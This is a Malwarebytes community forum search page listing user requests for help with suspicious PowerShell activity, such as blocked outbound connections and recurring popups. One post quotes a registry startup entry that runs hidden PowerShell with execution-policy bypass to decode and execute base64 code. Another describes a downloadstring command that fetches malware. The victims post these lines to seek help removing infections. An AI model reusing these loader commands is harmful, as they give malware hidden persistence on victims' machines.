Jump to content

Search the Community

Showing results for tags 'powershell'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Announcements
    • Malwarebytes News
    • Beta Testing Program
  • Malware Removal Help
    • Windows Malware Removal Help & Support
    • Mac Malware Removal Help & Support
    • Mobile Malware Removal Help & Support
    • Malware Removal Self-Help Guides
  • Malwarebytes for Home Support
    • Malwarebytes for Windows Support Forum
    • Malwarebytes for Mac Support Forum
    • Malwarebytes for Android Support Forum
    • Malwarebytes for iOS Support
    • Malwarebytes Privacy
    • Malwarebytes Browser Guard
    • False Positives
    • Comments and Suggestions
  • Malwarebytes for Business Support
    • Malwarebytes Nebula
    • Malwarebytes Nebula Modules
    • Malwarebytes Endpoint Security
    • Other Malwarebytes Business Products
    • Malwarebytes Business Products Comments and Suggestions
  • Malwarebytes Tools and Other Products
    • Malwarebytes AdwCleaner
    • Malwarebytes Junkware Removal Tool Support
    • Malwarebytes Anti-Rootkit BETA Support
    • Malwarebytes Techbench USB (Legacy)
    • Malwarebytes Secure Backup discontinued
    • Other Tools
    • Malwarebytes Tools Comments and Suggestions
  • General Computer Help and Security Updates
    • BSOD, Crashes, Kernel Debugging
    • General Windows PC Help
  • Research Center
    • Newest Rogue-Ransomware Threats
    • Newest Malware Threats
    • Newest Mobile Threats
    • Newest IP or URL Threats
    • Newest Mac Threats
    • Report Scam Phone Numbers
  • General
    • General Chat
    • Forums Announcements & Feedback

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...


  • Start





Website URL






  1. I've been recieving this warning every minute: Malwarebytes www.malwarebytes.com -Detalles del registro- Fecha del evento de protección: 16/5/22 Hora del evento de protección: 13:30 Archivo de registro: 3b6f9f60-d546-11ec-825e-047f0e039c04.json -Información del software- Versión: Versión de los componentes: 1.0.1676 Versión del paquete de actualización: 1.0.55055 Licencia: Premium -Información del sistema- SO: Windows 11 (Build 22000.675) CPU: x64 Sistema de archivos: NTFS Usuario: System -Detalles del sitio web bloqueado- Sitio web malicioso: 1 , C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Bloqueado, -1, -1, 0.0.0, , -Datos de sitio web- Categoría: Riskware Dominio: wmail-service.com Dirección IP: Puerto: 80 Tipo: Saliente Archivo: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (end) Could you please help me with this? Thanks
  2. Hey! I like others came here with a problem, I got a ...virus? So yesterday I scanned my laptop with Malwarebytes and quarantined all the malwares. But today I keep getting notifications said that: RTP detection, the software was powershell.exe and it was a trojan virus. I had already run a scan with Farbar Recovery Scan Tool, hope you guys can help me out. Sorry for my bad English. FRST.txt Addition.txt
  3. Hi, Good day to all. Four days ago, my pc windows defender/windows security was detected Trojan:PowerShell/PsInjection.A as severe threat, example as below: I have scanned through Malwarebytes, but no virus detected. Report as follows: Malwarebytes www.malwarebytes.com -Log Details- Scan Date: 10/10/19 Scan Time: 12:52 PM Log File: d37b26f4-eb19-11e9-a05d-98eecb7ba763.json -Software Information- Version: Components Version: 1.0.627 Update Package Version: 1.0.12833 License: Free -System Information- OS: Windows 10 (Build 18362.418) CPU: x64 File System: NTFS User: DESKTOP-7ICM204\User -Scan Summary- Scan Type: Threat Scan Scan Initiated By: Manual Result: Completed Objects Scanned: 404571 Threats Detected: 0 Threats Quarantined: 0 Time Elapsed: 2 min, 53 sec -Scan Options- Memory: Enabled Startup: Enabled Filesystem: Enabled Archives: Enabled Rootkits: Enabled Heuristics: Enabled PUP: Detect PUM: Detect -Scan Details- Process: 0 (No malicious items detected) Module: 0 (No malicious items detected) Registry Key: 0 (No malicious items detected) Registry Value: 0 (No malicious items detected) Registry Data: 0 (No malicious items detected) Data Stream: 0 (No malicious items detected) Folder: 0 (No malicious items detected) File: 0 (No malicious items detected) Physical Sector: 0 (No malicious items detected) WMI: 0 (No malicious items detected) (end) As I have read from the forum, I have downloaded FRST64 and scanned, the FRST.txt and Addition.txt are attached as follows: Addition.txtFRST.txt Hope that anyone can help on this matter. Thanks in advance! Best Regards, SHT
  4. Dear, forum For the last couple of days, I have had a MBAE popup saying it has blocked an exploit attempt on Powershell. It pops up every 20 minutes. I have run RogueKiller, which only found an issue with Hola VPN (which I have now removed). I also tried to turn off Powershell in "Control Panel > Programs and features > Turn Window Features On and OFF". This did not help. I have Windows 10. I use Windows Defender as virus protection. The MBAE build is After reading several posts, it seems to me that there is no one-fix-that-works-for-everyone. So I'm turning to you experts asking if you could please help me. Best regards, Harald
  5. Hello, i have problem with powershell.exe it slow down my pc, but i dont know what to do to delete him, can anybody help me please? I saw few topics and i installed frst64 in attach are logs. Thank you. Addition.txt FRST.txt
  6. Back on August 17, I installed Malwarebytes on my machine since I was having performance issues. The scan found 16 threats on my PC, and removed them as such. Even after this scan though, and several others, Windows Powershell is still performing some suspicious activity. Malwarebytes will occasionally notify me of an outbound connection to "wentz.pw" that Powershell keeps attempting to make. This is classified as "riskware", but I'm concerned since I can't get rid of it. Attached is the log for the most recent connection attempt. blocklog.txt
  7. Every time I restart my PC, I get a notification from Malwarebytes that a 'website was blocked due to malware'. It claims to be an outbound connection affecting the file 'powershell.exe'. The website is f.top4top.net. Malwarebytes identifies this as malware but it is not a program I can remove and I have never visited that website. I'm looking to sort out whatever the issue may be here. The logs can be found below. Malwarebytes www.malwarebytes.com -Log Details- Protection Event Date: 7/8/18 Protection Event Time: 4:25 PM Log File: 137327b6-82ed-11e8-8c03-1c1b0d993f99.json Administrator: Yes -Software Information- Version: Components Version: 1.0.374 Update Package Version: 1.0.5823 License: Trial -System Information- OS: Windows 10 (Build 17134.112) CPU: x64 File System: NTFS User: System -Blocked Website Details- Malicious Website: 1 , , Blocked, [-1], [-1],0.0.0 -Website Data- Category: Malware Domain: f.top4top.net IP Address: Port: [49871] Type: Outbound File: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (end)
  8. Hi Malwarebytes support, My windows 10 was affected by adware/malware and I have used malwarebytes to remove most of it. However, there' still one malware that can't be removed by malwarebytes. Whenever I startup my windows a powershell cmd appears for a brief second and disappears. I took a screenshot for your reference (refer to attached). It appears to be a powershell command that executes new-object net.webclient.downloadstring(URL). Malwarebyte then detects a malware found at the location c:\windows\winime.exe and quarantines it. Sometimes a myexe.exe malware is also found. Hence i remove it from the quarantine. But that did not fix the problem. Everytime i restart my laptop, the powershell launched again and malwarebytes detected the malware again and quarantine it. Process repeats at every startup. It appears to be that the powershell command that was executed at startup causes this. I have no idea how to remove that powershell cmd or prevent the it from running the command. Please help. Would greatly appreciate your help on this. Malwarebyte did not detect the powershell problem. Regards, Dil
  9. I have PowerShell on windows server 2008 R2 using cpu 100% and I have attach file: Addition.txt and FRST.txt help analyze. I hope to get help with this issue. Thanks you, Oatstate Addition.txt FRST.txt
  11. I should thank to Malwarebytes to remove the Ransomware from my PC. unfotunately, it doesn't fix my computer completely. i read a post so i run the same thing like it was told. please help me to analyze my FR i should fixST and Addition file reported by farbar recovery tool. what i should do next? Addition.txt FRST.txt
  12. Hi my name is win. My computer platform is Windows 10 Yesterday My powershell started appearing on my taskbar, just popping up before promptly disappearing. I was suspicious but up to date Avast and Malwarebytes scans didn't find anything so I assumed it was just a dodgy Windows update or something. So I run Farbar Recovery Scan Tool and RougeKiller according to the topic below. I have seen the topic below but i don't know if there are a different between me and him. So i decidRk.txtRk.txtRk.txte to ask you for your advice. I have attached my result here below. Thank you very much for your kindly help. FRST.txt Addition.txt RoKiller.txt
  13. Hi! Im basically having the same exact problem as this guy: After powershell runs, Malwarebytes scans and finds the same three PUP's. I keep deleting them, but powershell keeps putting them back on my computer. I don't know what to do about it and I don't want to mess with the registry logs without an experts assistance. Please Help! The Pup files.txt
  14. So I've posted before about some odd happenings and never really found a solution but think I got a little closer. In my event logs, I have several power shell events like pshell console starting a server (among other things), Multiple WMI services starting, and browser redirects. Nothing has ever been found by Win defender or MBAM Premium (I really don't feel like they're working - on the surface they seem to working fine but I think it's an illusion). Hitman Pro did find a file Win32.Droma.abdb (first malicious file I've ever found) and that led me to googling that and found this article. http://niiconsulting.com/checkmate/2014/04/analysis-of-malware-detecting-behavior-anti-reversing-techniques/ ^^Please read! That almost explains my situation to a tee - I've even seen Russian/Chinese sites that will occasionally pop up on google suspiciously. If you look at my Registry or a Driverquery of my windows drivers, there are red flags everywhere. As far as I know I'm on the latest update of Win10 but I'm not sure anymore. I was hoping an expert could read the above article and know immediately what's going on or, if not, help me figure it out in order to get rid of it I've reinstalled windows after nuking it 5 times. I've been careful about any kind of syncing application (I don't even have chrome installed) and have reset the sync of any services I do use. I could go on but will stop here and wait for an experts advice should I run FRST? Oh yeah, some programs think I'm on Windows 8 (including mbam) and I thinks that's due to registry infection. i would LOVE to get a clean bill of health because this has consumed way to much of my life in the past ~8 months off an on. Thanks in advance! Fingers crossed
  15. Hi, so as the title states, Windows Powershell opens up maybe three or four times a day in the background and then quickly shuts itself down after a second. I haven't really seen any negative side effects from this, but it's starting to get annoying. I have run Malwarebytes scan but it has returned 0 identified threats. Are there any recommended options? Thank you!
  16. Every time I turn on my computer and start doing stuff, a windows powershell cmd pop up for a few seconds and then dissapear. I then start runing Malwarebytes and I find 5 Potentially Unwated Programs related to it. I put them on Quarantine and restart, and then everything start all over again. How do I get rid of whatever PowerShell is doing?
  17. Hi As stated from the title above, there is a suspicious program I've found in the startup as attached in the startup.txt named "{FB744D93...". I've tried to disable, and also removing it but nothing works. It is still there everytime upon laptop startup. It starts to behave like this after my brother inserted his flash drive into my laptop There is a topic that is more likely the same (if I'm not mistaken) that has been posted yesterday. Thus I have attached all the required files. Thanks in advance! Addition.txt FRST.txt regexport.txt startup.txt
  18. Iv got this really annoying problem with powershell.exe, sometimes i cant even access any internet domain and it doesnt let me update the antivirus (ESET). The powershell.exe starts up with windows and nothing that i did could prevent it from doing so, iv scanned this pc with Malwarebytes, RougueKiller, ZHPCleaner, ADWcleaner, Spyware and Farbar, but none of those found anything, besides rouguekiller, but the files it deleted came back as soon as the pc restarted. Im trully lost in this one, pls help Here are the logs from the scans iv ran Addition.txt FRST.txt JRT.txt mrt.log Roguekiller log.txt ZHPCleaner.txt
  19. I wrote a Powershell script that uploads and downloads files through FTP. The script is located on a server, and 5 computers have shortcuts that point to the script. Anti-Exploit is running on all computers and managed through the Management console on the server. One of the computers occasionally blocks this file and identifies it as an exploit. ("Exploit Payload process blocked"). Once the computer is restarted or anti-exploit is restarted, we don't have issues for days at a time. The issue ONLY occurs on this specific computer, and only sporadically.
  20. First time asking for help. For awhile(past week or so) now Powershell pops up for a sec in my taskbar, then Malwarebytes give me a popup saying that it blocks off some connection from forallshop.info, usually at 12:09 P.M. and 8:09 P.M. it also does this every day, though it has skipped a days once in awhile. My primary security is Mcafee. I've run Malwarebytes, the Malwarebytes adware cleaner, Anti-rootkit, and Junk Removal tool, I've also ran Zemana, Hitmanpro, and Sophos Virues Removal Tool. Any advice?
  21. Hi, I posted something similar a few weeks back but got no response. I think my computer is infected with malware that uses windows powershell to execute. I have Malwarebytes Premium and every now and then it blocks the domain 'tablezip.info'. It's persistent and every time I attempt to scan and remove it, it reappears after a few days and I get pop-ups and malicious adware. Any help removing would be greatly appreciated. Addition.txt FRST.txt
  22. Last week i wasn't able to use my internet banking due to the https certificate not being recognized. At the same time, some websites would not load, and Chrome kept saying i wasn't connected to the internet - which i was, as pages loaded normally on my phone. I reset my router to factory setting and reconfigured the network settings to no avail. It was only then that i found that my LAN is set to a proxy server on Once i unchecked that, everything was fine, but that option gets checked again (with a different port) everytime i reboot. As i was snooping around my active processes looking for the issue, i stumbled upon some that i didn't recognize, most notably one called SYS*MY PC NAMETAG*50.EXE, apparently related to powershell. It's located on the Java folder under syswow64, but it didn't exist until recently and i haven't updated Java in a while. It also eats up a shitload of memory... There's a few other processes i couldnt recognize, but i figured i should get a full activity log analysed by someone who might be able to pinpoint if there's any malware around. Could you guys please help me out?
  23. I have been having this issue for a while now, powershell exe keeps appearing on my taskbar out of nowhere. Absolutely nothing changes on my screen but I just see it appear and disappear in a few seconds every now and then. I read up online and found scary things like ransomware and locked files and what not, so I decided to try out a bunch of online methods to get rid of it. Initially I had AVAST, but since that wasn't detecting anything I uninstalled it and got the free version of AVG, which detected the powershell exe file trying to connect to a website "camel support" but I couldn't do anything about it, as AVG would prompt every now and then that it stopped Powershell from connecting to the camel support website but I couldn't find anywhere on the internet how to get rid of it completely. I uninstalled AVG and downloaded Malwarebytes but that did nothing then I got Bit Defender on a one month full functioning trial, hoping it would find the problem and get rid of it, but Bit Defender is doing exactly what AVG does, it only blocks Powershell from connecting to Camel Support. Is there anyway I could delete powershell or re-install or something? I am not computer literate at all, I hope someone here can tell me whats going on and how I can get rid of it. Thank you so much.
  24. So in the past 1-2 months an icon of Windows Powershell appeared randomly and soon after disappeared from my task bar. A few weeks later I started getting Avast warnings that some threat named Camel host had been blocked, so I did a few scans both on Avast and Malwarebytes but nothing came up, then the warning popped up again. Furthermore the "virus" doesn't seem to affect anything and I don't mind removing Windows Powershell if removing it doesn't have any major consequences.
  25. Hey, new user on the malwarebytes forums here. Ok, so I scanned my computer with malwarebytes, and it detected "PUP.Optional.PowerShellSP" And that's ok, I mean it's just one threat right? But I started checking the actual registry key, and this MF is actually running powershell, which runs (binary?) code stored in my registry. Does anyone want to check what the code was doing? Here's the registry entry that malwarebytes detected: "{F119BFAB-D0C9-4E62-9DCF-7923777499B1}"="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\\Software\\Classes\\HCOVLIORJR').CEHMMUJMQRDF)));" I kinda wanted to post this in the "new malware" category, since the registry entry that it executes wasn't detected by malwarebytes, but it did detect the part where it runs.
Back to top
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.